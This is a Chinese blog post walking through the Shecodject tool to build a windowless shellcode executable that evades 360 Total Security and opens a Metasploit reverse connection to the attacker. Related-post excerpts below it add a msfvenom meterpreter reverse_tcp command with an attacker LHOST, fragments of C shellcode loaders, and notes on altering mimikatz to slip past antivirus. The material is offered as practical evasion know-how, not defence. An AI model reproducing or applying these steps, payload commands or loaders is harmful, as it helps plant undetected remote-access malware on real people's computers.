shellcode之360安全卫士免杀(shecodject)(一)

原创 已于 2022-07-16 18:03:04 修改 · 1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#系统安全 #安全

于 2022-07-16 18:00:26 首次发布
本文介绍了如何使用shecodject工具进行shellcode生成,通过环境部署和步骤演示,展示了如何生成免杀的exe文件,成功在windows系统下绕过360安全卫士的检测,并通过msfconsole实现反弹连接。

环境部署

 

shecodject工具下载地址:

https://github.com/TaroballzChen/Shecodject

安装模块:

运行python3下运行shecodject/setup/setup.py,如图所示:

shellcode生成

部署之后,运行shecodject.py文件,如图所示:

输入mpr, 确认ip、port、payload、文件名称等,如图所示:

 确认后执行run,成功后back返回,如图所示:

 执行exe,如图所示

 设置noconsole为True,确认生成文件为07202263.exe,如图所示:

 执行run命令,生成exe文件,如图所示:

 拷贝exe文件至windows。

msfconsole开启监听,如图所示:

 windows下360未告警,

运行 07202263.exe,如图所示:

 

msfconsole反弹成功:

后续继续分享火绒及Defender。

【护网必备】Windows平台shellcode加载器
Fly_鹏程万里
06-14 1045
bypass:McAfee、金山(数字签名)、火绒、ESET、卡巴企业版(时间5s 抖动50 Sleep_mask)、360全家桶(物理机)、Norton(加白程序资源)、WDF(PC)、WDF(Server)、Symantec(加白程序资源)bypass:金山(数字签名)、火绒、ESET、360全家桶(物理机)、WDF(PC)、WDF(服务器提示复查(关云保护))、McAfee、Norton(加白程序资源)、卡巴企业版(时间5s 抖动50 Sleep_mask)必须使用Bof操作,shell运行就掉线。
360全家桶
sash1mi
01-28 4272
360全家桶 1.kali生成shellcode msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 LHOST=kali的ip地址 LPORT=随便写个端口号(8888、9999都阔以) -f c 2.VS编写程序 这里给出代码 #include <windows.h> #include <stdio.h> (这里是我生成的shellcode) unsigned char
360安全卫士
qq_43647462的博客
11-15 949
绕过360安全卫士(无法绕过火绒) Buchiyexiao #include <windows.h> #include <stdio.h> #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//不显示窗口 unsigned char shellcode[] = "veil_shellcode"; void main() { LPVOID Memory = VirtualAlloc
利用360软件设置的360终极.绝对过360
11-19
哼哼,研究了半年终于弄出了个利用360内部程序做的360.百分之百过360.... 希望大家采纳!!!!!
360安全卫士器.rar
01-06
希望能帮助你们!
mimikatz360和火绒
qq_44905657的博客
12-28 2349
mimikatz mimikatz是款能够从Windows认证(LSASS)的进程中获取内存,并且获取名闻密码和NTLM哈希值的工具,攻击者可以利用这种功能漫游内网。也可以通过明文密码或者hash值进行提权。这款工具机器出名所以被查的几率极高。 1、方式 对mimikatz我们进行源码。源码只需要定位源码中的特征代码进行修改就可以达到预期的效果。般的定位特征码分为三种:定位倒代码上,定位到字符串上,定位到输入表上。 2、处理 我们访问https://github.com/genti
Shellcode,绕过360安全卫士、火绒安全、腾讯管家
热门推荐
qq_1873822的博客
08-22 2万+
前言 分享个傻瓜式直接套用大佬的框架进行shellcode,自己还是萌新还需要学习很多东西,大佬们不喜勿喷 毒原理 360、腾讯电脑管家、火绒剑、金山毒霸、瑞星等等,这几个毒软件领头羊,现在的毒软件都无法脱离三个部分,扫描器、病毒库、虚拟机。然而毒软件做的是否好用,最主要的还是扫描器的速度、准确率以及病毒库是否庞大。 1.基于特征码的静态扫描技术 这种技术很容易被人想到,所以第代的毒软件出现了,他们的毒思想就是,我只要匹配到特征字符串就可以判断出来这个文件是个病毒。但这种方法在当今
shellcode loader,bypassav,款基于python的shellcode加载器.zip
08-22
款基于Python的shellcode加载器”则表明这是款使用Python语言编写的软件,它专注于加载shellcode,并且具有的特性。Python是种广泛使用的高级编程语言,以其简洁的语法和强大的库支持著称。在安全...
网络安全基于C++的Shellcode加载器技术:绕过火绒等主流软的恶意代码隐蔽执行方法研究
最新发布
11-23
内容概要:本文介绍了如何通过修改和加密技术实现“”以绕过火绒等安全软件的检测,重点演示了使用Visual Studio 2026创建C++项目并集成shellcode-loader加载器的过程。通过Cobalt Strike生成恶意载荷,利用sgn...
全套教程+工具合集
08-25
远控专题(1)-基础篇.pdf 远控专题(2)-msfvenom隐藏的参数.pdf 远控专题(3)-msf自带(VT率35-69).pdf 元控专题(4)-Evasion模块(VT率12-71).pdf 远控专题(5)-Veil(VT率23-...
360专用器 ,
09-08
360专用步过360、经本人修改、目前有效,,
360壳,
06-11
360壳过360云查。主动防御提示
360四引擎
11-19
360360360360360360360360360360360360360360360360360360360360360
360(误)封包工具支持各种游戏截取封包...
11-19
360(误)封包工具支持各种游戏截取封包...封包工具 易语言
最新360
12-17
最新360云查
【kali笔记】MSF内网渗透,手把手教你如何360!网络安全零基础入门到精通教程!
资深程序员,曾自学JAVA,C#,如今从业于网安行业
11-29 1170
技术通过修改病毒、木马的内容或者特征码,使其能够躲避毒软件的查毒软件通常通过识别病毒或木马的特征码来检测和清楚恶意软件。技术通过修改这些特征码,使病毒或木马在毒软件的检测下“隐身”。我给大家准备了份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接费领取~与反的较量永无止境。本文所述方法目前有效,但技术日新月异,需不断实践与创新,方能在实战中立于不败之地。
360笔记
司徒荆的博客
06-22 116
1、360---BD引擎 (1)360-Bd把特征码定位在版权部分 (2)360-Bd把字符串定位在字符串内面 (3)360-Bd吧特特征码定位在资源位置(版权,图标,图片之类的) 2、360-QVM引擎 (1)定位比较麻烦 (2)定位到OLEAUT32.dll,修改时候,延时加载 #pragma comment (linker,"/DELAYLOAD:OLEAUT32.dll");...
简单过火绒、360极速版
摔不死的笨鸟的博客
03-03 2427
360工具无病毒
06-03
服务端要小,持久,能过360国内主流 我更新终结者远控。这个肯定有,达到98% 我不敢保证全部.这是骗人的!我实话
域渗透与策略:提升网络安全防护
同时,Shellcode技术也被用于逃避安全软件的扫描,使得攻击者能够在不被发现的情况下执行恶意代码。 文章深入讨论了如何通过这些技术手段进行对抗,以及如何通过强化安全策略、实施有效的防护措施,如更新补丁...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

K2epUp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值